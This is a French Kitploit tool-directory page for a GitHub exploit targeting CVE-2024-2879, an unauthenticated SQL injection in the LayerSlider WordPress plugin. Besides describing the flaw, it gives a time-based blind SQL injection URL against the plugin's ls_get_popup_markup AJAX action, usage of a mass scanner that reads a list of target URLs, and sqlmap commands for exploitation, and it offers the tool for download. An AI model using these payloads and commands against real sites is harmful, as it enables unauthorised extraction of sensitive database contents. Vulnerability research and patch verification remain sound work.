Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-2879 — CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Injection SQL non authentifiée | Kitploit
Outils/GitHubGitHub/herculeszxc/cve-2024-2879
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Injection SQL non authentifiée

Voir le dépôt
223il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-2879

Description

LayerSlider 7.9.11 - 7.10.0 - Injection SQL non authentifiée

Le plugin LayerSlider pour WordPress est vulnérable à une injection SQL via l'action ls_get_popup_markup dans les versions 7.9.11 et 7.10.0 en raison d'un échappement insuffisant sur le paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.

Utilisation du scanner

  1. Installer les dépendances : pip install -r requirements.txt
  2. python3 scan.py or <urllist.txt> image

Vérification manuelle si le site n'est pas protégé par un WAF

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" Temps de réponse avec un délai de 5 secondes image

Exploitation avec SQL Map

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T ou sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

Télécharger l’outil